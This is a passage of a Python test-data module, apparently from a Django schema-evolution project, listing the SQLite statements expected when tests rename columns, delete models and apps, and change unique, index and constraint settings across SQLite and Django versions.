                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
                % generate_index_name('tests_testmodel', 'int_field1'),
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_column" TO "custom_db_column3";',
            ],
        })
    else:
        # Older SQLite must perform the column rename through a full table
        # rebuild (new column name in CREATE/INSERT, old name in SELECT).
        mappings.update({
            'DBColumnChangeModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "alt_pk" integer NOT NULL,'
                ' "customised_db_column" integer NOT NULL,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "int_field3" integer NOT NULL UNIQUE,'
                ' "int_field4" integer NOT NULL,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "char_field1" varchar(25) NULL,'
                ' "char_field2" varchar(30) NOT NULL,'
                ' "dec_field" decimal NOT NULL,'
                ' "dec_field1" decimal NULL,'
                ' "dec_field2" decimal NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_id", "alt_pk", "customised_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2")'
                ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
                % generate_index_name('tests_testmodel', 'int_field1'),
            ],
            'MultiAttrChangeModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "alt_pk" integer NOT NULL,'
                ' "custom_db_column2" integer NOT NULL,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "int_field3" integer NOT NULL UNIQUE,'
                ' "int_field4" integer NOT NULL,'
                ' "char_field" varchar(35) NOT NULL,'
                ' "char_field1" varchar(25) NULL,'
                ' "char_field2" varchar(30) NULL,'
                ' "dec_field" decimal NOT NULL,'
                ' "dec_field1" decimal NULL,'
                ' "dec_field2" decimal NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_id", "alt_pk", "custom_db_column2", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2")'
                ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
                % generate_index_name('tests_testmodel', 'int_field1'),
            ],
            'RedundantAttrsChangeModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "alt_pk" integer NOT NULL,'
                ' "custom_db_column3" integer NOT NULL,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "int_field3" integer NOT NULL UNIQUE,'
                ' "int_field4" integer NOT NULL,'
                ' "char_field" varchar(35) NOT NULL,'
                ' "char_field1" varchar(25) NULL,'
                ' "char_field2" varchar(30) NULL,'
                ' "dec_field" decimal NOT NULL,'
                ' "dec_field1" decimal NULL,'
                ' "dec_field2" decimal NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_id", "alt_pk", "custom_db_column3", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2")'
                ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
                % generate_index_name('tests_testmodel', 'int_field1'),
            ],
        })

    return mappings
def delete_model(connection):
    """SQL test statements for the DeleteModelTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Each test maps to the tables expected to be dropped, in order.
    # M2M intermediary tables are dropped before their owning model's
    # table.
    dropped_tables = {
        'BasicModel': [
            'tests_basicmodel',
        ],
        'BasicWithM2MModel': [
            'tests_basicwithm2mmodel_m2m',
            'tests_basicwithm2mmodel',
        ],
        'CustomTableModel': [
            'custom_table_name',
        ],
        'CustomTableWithM2MModel': [
            'another_custom_table_name_m2m',
            'another_custom_table_name',
        ],
    }

    return {
        test_name: [
            'DROP TABLE "%s";' % table_name
            for table_name in table_names
        ]
        for test_name, table_names in dropped_tables.items()
    }
def rename_model(connection):
    """SQL test statements for the RenameModelTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Every rename that changes the table emits the same statement;
    # renames that keep the same table emit no SQL at all.
    rename_sql = \
        'ALTER TABLE "tests_testmodel" RENAME TO "tests_destmodel";'

    return {
        'RenameModel': [rename_sql],
        'RenameModelSameTable': [],
        'RenameModelForeignKeys': [rename_sql],
        'RenameModelForeignKeysSameTable': [],
        'RenameModelManyToManyField': [rename_sql],
        'RenameModelManyToManyFieldSameTable': [],
    }
def delete_application(connection):
    """SQL test statements for the DeleteAppTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Tables are dropped in order: M2M intermediary table first, then the
    # models' tables, then the custom-named tables.
    tables_to_drop = [
        'tests_testmodel_anchor_m2m',
        'tests_testmodel',
        'tests_appdeleteanchor1',
        'app_delete_custom_add_anchor_table',
        'app_delete_custom_table_name',
    ]

    return {
        'DeleteApplication': [
            'DROP TABLE "%s";' % table_name
            for table_name in tables_to_drop
        ],
        'DeleteApplicationWithoutDatabase': [],
    }
def rename_field(connection):
    """SQL test statements for the RenameFieldTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    generate_index_name = make_generate_index_name(connection)

    # M2M table renames are plain ALTER TABLE ... RENAME on every SQLite
    # version, so these entries are version-independent.
    mappings = {
        'RenameManyToManyTableModel': (
            'ALTER TABLE "tests_testmodel_m2m_field"'
            ' RENAME TO "tests_testmodel_renamed_field";'
        ),
        'RenameManyToManyTableWithColumnNameModel': (
            'ALTER TABLE "tests_testmodel_m2m_field"'
            ' RENAME TO "tests_testmodel_renamed_field";'
        ),
        'RenameNonDefaultManyToManyTableModel': (
            'ALTER TABLE "non-default_db_table"'
            ' RENAME TO "tests_testmodel_renamed_field";'
        ),
    }

    if sqlite_version >= (3, 26):
        # Newer SQLite supports ALTER TABLE ... RENAME COLUMN, so all
        # column renames are single statements.
        mappings.update({
            'RenameColumnModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "int_field" TO "renamed_field";'
            ),
            'RenameColumnWithTableNameModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "int_field" TO "renamed_field";'
            ),
            'RenamePrimaryKeyColumnModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "id" TO "my_pk_id";'
            ),
            'RenameForeignKeyColumnModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_col_name" TO "renamed_field";'
            ),
            'RenameNonDefaultColumnNameModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_col_name" TO "renamed_field";'
            ),
            'RenameNonDefaultColumnNameToNonDefaultNameModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_col_name"'
                ' TO "non-default_column_name";'
            ),
            'RenameNonDefaultColumnNameToNonDefaultNameAndTableModel': (
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_col_name"'
                ' TO "non-default_column_name2";'
            ),
            'RenameColumnCustomTableModel': (
                'ALTER TABLE "custom_rename_table_name"'
                ' RENAME COLUMN "value" TO "renamed_field";'
            ),
        })
    else:
        if django_version >= (1, 7):
            # On Django 1.7 and higher, M2M intermediary tables set
            # references on the field pointing back to the owning model. This
            # triggers our special logic on SQLite <= 3.25 that performs a
            # schema rewrite in order to update those references to point to
            # the new table name.
            mappings['RenamePrimaryKeyColumnModel'] = [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_pk_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "int_field" integer NOT NULL,'
                ' "custom_db_col_name" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_pk_id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
                # The schema rewrite directly patches sqlite_master so that
                # foreign keys elsewhere point at the renamed PK column.
                '-- Start of a new transaction:',
                'PRAGMA writable_schema = 1;',
                'UPDATE sqlite_master SET sql = replace(sql,'
                ' \' REFERENCES "tests_testmodel" ("id") \','
                ' \' REFERENCES "tests_testmodel" ("my_pk_id") \');',
                # The schema version bump is non-deterministic, so the test
                # matches it with a regular expression.
                re.compile(r'PRAGMA schema_version = \d+;'),
                'PRAGMA writable_schema = 0;',
                'PRAGMA integrity_check;',
                '-- Run outside of a transaction:',
                'VACUUM;',
            ]
        else:
            # Django 1.6 and earlier don't generate those references on the
            # M2M intermediary table, so we don't need to worry about the
            # schema rewrite.
            mappings['RenamePrimaryKeyColumnModel'] = [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_pk_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "int_field" integer NOT NULL,'
                ' "custom_db_col_name" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_pk_id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
            ]

        # Older SQLite performs every column rename as a full table
        # rebuild: new column name in CREATE/INSERT, old name in SELECT.
        mappings.update({
            'RenameColumnModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "renamed_field" integer NOT NULL,'
                ' "custom_db_col_name" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "char_field", "renamed_field", "custom_db_col_name",'
                ' "custom_db_col_name_indexed", "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
            ],
            'RenameColumnWithTableNameModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "renamed_field" integer NOT NULL,'
                ' "custom_db_col_name" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "char_field", "renamed_field", "custom_db_col_name",'
                ' "custom_db_col_name_indexed", "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
            ],
            'RenameForeignKeyColumnModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("int_field" integer NOT NULL,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "custom_db_col_name" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "renamed_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED,'
                ' "id" integer NOT NULL UNIQUE PRIMARY KEY);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("renamed_field", "char_field", "int_field",'
                ' "custom_db_col_name_indexed", "fk_field_id", "id")'
                ' SELECT "custom_db_col_name", "char_field", "int_field",'
                ' "custom_db_col_name_indexed", "fk_field_id", "id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel" '
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("renamed_field_id");'
                % generate_index_name('tests_testmodel', 'renamed_field_id'),
            ],
            'RenameNonDefaultColumnNameModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "int_field" integer NOT NULL,'
                ' "renamed_field" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "char_field", "int_field", "renamed_field",'
                ' "custom_db_col_name_indexed", "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
            ],
            'RenameNonDefaultColumnNameToNonDefaultNameModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "int_field" integer NOT NULL,'
                ' "non-default_column_name" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "char_field", "int_field", "non-default_column_name",'
                ' "custom_db_col_name_indexed", "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
            ],
            'RenameNonDefaultColumnNameToNonDefaultNameAndTableModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NOT NULL,'
                ' "int_field" integer NOT NULL,'
                ' "non-default_column_name2" integer NOT NULL,'
                ' "custom_db_col_name_indexed" integer NOT NULL,'
                ' "fk_field_id" integer NOT NULL'
                ' REFERENCES "tests_renameanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "char_field", "int_field",'
                ' "non-default_column_name2", "custom_db_col_name_indexed",'
                ' "fk_field_id")'
                ' SELECT "id", "char_field", "int_field",'
                ' "custom_db_col_name", "custom_db_col_name_indexed",'
                ' "fk_field_id"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel"'
                ' ("custom_db_col_name_indexed");'
                % generate_index_name('tests_testmodel',
                                      'custom_db_col_name_indexed',
                                      'int_field_named_indexed'),
                'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
                % generate_index_name('tests_testmodel', 'fk_field_id',
                                      'fk_field'),
            ],
            'RenameColumnCustomTableModel': [
                'CREATE TABLE "TEMP_TABLE"'
                ' ("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" integer NOT NULL,'
                ' "alt_value" varchar(20) NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "renamed_field", "alt_value")'
                ' SELECT "id", "value", "alt_value"'
                ' FROM "custom_rename_table_name";',
                'DROP TABLE "custom_rename_table_name";',
                'ALTER TABLE "TEMP_TABLE"'
                ' RENAME TO "custom_rename_table_name";',
            ],
        })

    return mappings
def sql_mutation(connection):
    """SQL test statements for the SQLMutationTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Each statement adds one nullable integer column to the test table.
    # 'SQLMutationOutput' is expected to be the concatenation of the two
    # batches, so all three statements are built once and sliced.
    add_column_sql = [
        'ALTER TABLE "tests_testmodel"'
        ' ADD COLUMN "added_field%d" integer NULL;' % i
        for i in (1, 2, 3)
    ]

    return {
        'AddFirstTwoFields': add_column_sql[:2],
        'AddThirdField': add_column_sql[2:],
        'SQLMutationOutput': list(add_column_sql),
    }
def generics(connection):
    """SQL test statements for the GenericRelationsTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Index names vary by backend/Django version, so they're computed from
    # the connection rather than hard-coded into the expected SQL.
    generate_index_name = make_generate_index_name(connection)

    return {
        # Column deletion is expressed as a table rebuild (create temp
        # table, copy rows, drop, rename), then the indexes lost with the
        # old table are recreated.
        'DeleteColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "int_field" integer NOT NULL,'
            ' "content_type_id" integer NOT NULL'
            ' REFERENCES "django_content_type" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED,'
            ' "object_id" integer unsigned NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("id", "int_field", "content_type_id", "object_id")'
            ' SELECT "id", "int_field", "content_type_id", "object_id"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("content_type_id");'
            % generate_index_name('tests_testmodel', 'content_type_id',
                                  'content_type'),
            'CREATE INDEX "%s" ON "tests_testmodel" ("object_id");'
            % generate_index_name('tests_testmodel', 'object_id'),
        ],
    }
def unique_together(connection):
    """SQL test statements for the ChangeMetaUniqueTogetherTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Unique constraint names vary by backend/Django version, so they're
    # computed from the connection rather than hard-coded.
    generate_unique_constraint_name = \
        make_generate_unique_constraint_name(connection)

    mappings = {
        'setting_from_empty': [
            'CREATE UNIQUE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field1", "char_field1");'
            % generate_unique_constraint_name('tests_testmodel',
                                              ['int_field1', 'char_field1']),
        ],
        'append_list': [
            'CREATE UNIQUE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field2", "char_field2");'
            % generate_unique_constraint_name('tests_testmodel',
                                              ['int_field2', 'char_field2']),
        ],
        'set_remove': [
            'CREATE UNIQUE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field1", "char_field1");'
            % generate_unique_constraint_name('tests_testmodel',
                                              ['int_field1', 'char_field1']),
        ],
        'ignore_missing_indexes': [
            'CREATE UNIQUE INDEX "%s"'
            ' ON "tests_testmodel" ("char_field1", "char_field2");'
            % generate_unique_constraint_name('tests_testmodel',
                                              ['char_field1', 'char_field2']),
        ],
        'upgrade_from_v1_sig': [
            'CREATE UNIQUE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field1", "char_field1");'
            % generate_unique_constraint_name('tests_testmodel',
                                              ['int_field1', 'char_field1']),
        ],
    }

    if django_version >= (1, 9):
        # Django >= 1.9: constraint changes drop/create unique indexes
        # directly, with no table rebuild.
        mappings.update({
            'replace_list': [
                'DROP INDEX "%s";'
                % generate_unique_constraint_name(
                    'tests_testmodel',
                    ['int_field1', 'char_field1']),
                'CREATE UNIQUE INDEX "%s"'
                ' ON "tests_testmodel" ("int_field2", "char_field2");'
                % generate_unique_constraint_name(
                    'tests_testmodel',
                    ['int_field2', 'char_field2']),
            ],
            'removing': [
                'DROP INDEX "%s";'
                % generate_unique_constraint_name(
                    'tests_testmodel',
                    ['int_field1', 'char_field1']),
            ],
        })
    else:
        # Django < 1.9: removing/replacing a unique_together entry is
        # expressed as a full table rebuild instead.
        mappings.update({
            'replace_list': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "char_field1" varchar(20) NOT NULL,'
                ' "char_field2" varchar(40) NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "int_field1", "int_field2", "char_field1",'
                ' "char_field2")'
                ' SELECT "id", "int_field1", "int_field2", "char_field1",'
                ' "char_field2" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE UNIQUE INDEX "%s"'
                ' ON "tests_testmodel" ("int_field2", "char_field2");'
                % generate_unique_constraint_name(
                    'tests_testmodel',
                    ['int_field2', 'char_field2']),
            ],
            'removing': [
                'CREATE TABLE "TEMP_TABLE" '
                '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "char_field1" varchar(20) NOT NULL,'
                ' "char_field2" varchar(40) NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("id", "int_field1", "int_field2", "char_field1",'
                ' "char_field2")'
                ' SELECT "id", "int_field1", "int_field2", "char_field1",'
                ' "char_field2" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
        })

    return mappings
def index_together(connection):
    """SQL test statements for the ChangeMetaIndexTogetherTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # index_together indexes use a different naming scheme than
    # field-level indexes, hence index_together=True below.
    generate_index_name = make_generate_index_name(connection)

    return {
        'setting_from_empty': [
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field1", "char_field1");'
            % generate_index_name('tests_testmodel',
                                  ['int_field1', 'char_field1'],
                                  index_together=True),
        ],
        'replace_list': [
            'DROP INDEX "%s";'
            % generate_index_name('tests_testmodel',
                                  ['int_field1', 'char_field1'],
                                  index_together=True),
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field2", "char_field2");'
            % generate_index_name('tests_testmodel',
                                  ['int_field2', 'char_field2'],
                                  index_together=True),
        ],
        'append_list': [
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field2", "char_field2");'
            % generate_index_name('tests_testmodel',
                                  ['int_field2', 'char_field2'],
                                  index_together=True),
        ],
        'removing': [
            'DROP INDEX "%s";'
            % generate_index_name('tests_testmodel',
                                  ['int_field1', 'char_field1'],
                                  index_together=True),
        ],
        'ignore_missing_indexes': [
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("char_field1", "char_field2");'
            % generate_index_name('tests_testmodel',
                                  ['char_field1', 'char_field2'],
                                  index_together=True),
        ],
    }
def constraints(connection):
    """SQL test statements for the ChangeMetaConstraintsTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Every constraint change is expressed as a table rebuild: the new
    # table is created with the desired table-level CONSTRAINT clauses,
    # the rows are copied, and the old table is dropped/renamed.  The
    # INSERT lists only the data columns; constraints aren't copied.
    return {
        'append_list': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "char_field1" varchar(20) NOT NULL,'
            ' "char_field2" varchar(40) NOT NULL,'
            ' CONSTRAINT "base_check_constraint"'
            ' CHECK ("char_field1" LIKE \'test%\' ESCAPE \'\\\'),'
            ' CONSTRAINT "base_unique_constraint_plain"'
            ' UNIQUE ("int_field1", "char_field1"),'
            ' CONSTRAINT "new_unique_constraint"'
            ' UNIQUE ("int_field2", "int_field1"),'
            ' CONSTRAINT "new_check_constraint"'
            ' CHECK ("int_field1" >= 100));',
            'INSERT INTO "TEMP_TABLE"'
            ' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
            ' SELECT "id", "int_field1", "int_field2", "char_field1",'
            ' "char_field2" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        # Removing all constraints rebuilds the table with none.
        'removing': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "char_field1" varchar(20) NOT NULL,'
            ' "char_field2" varchar(40) NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
            ' SELECT "id", "int_field1", "int_field2", "char_field1",'
            ' "char_field2" FROM "tests_testmodel";',
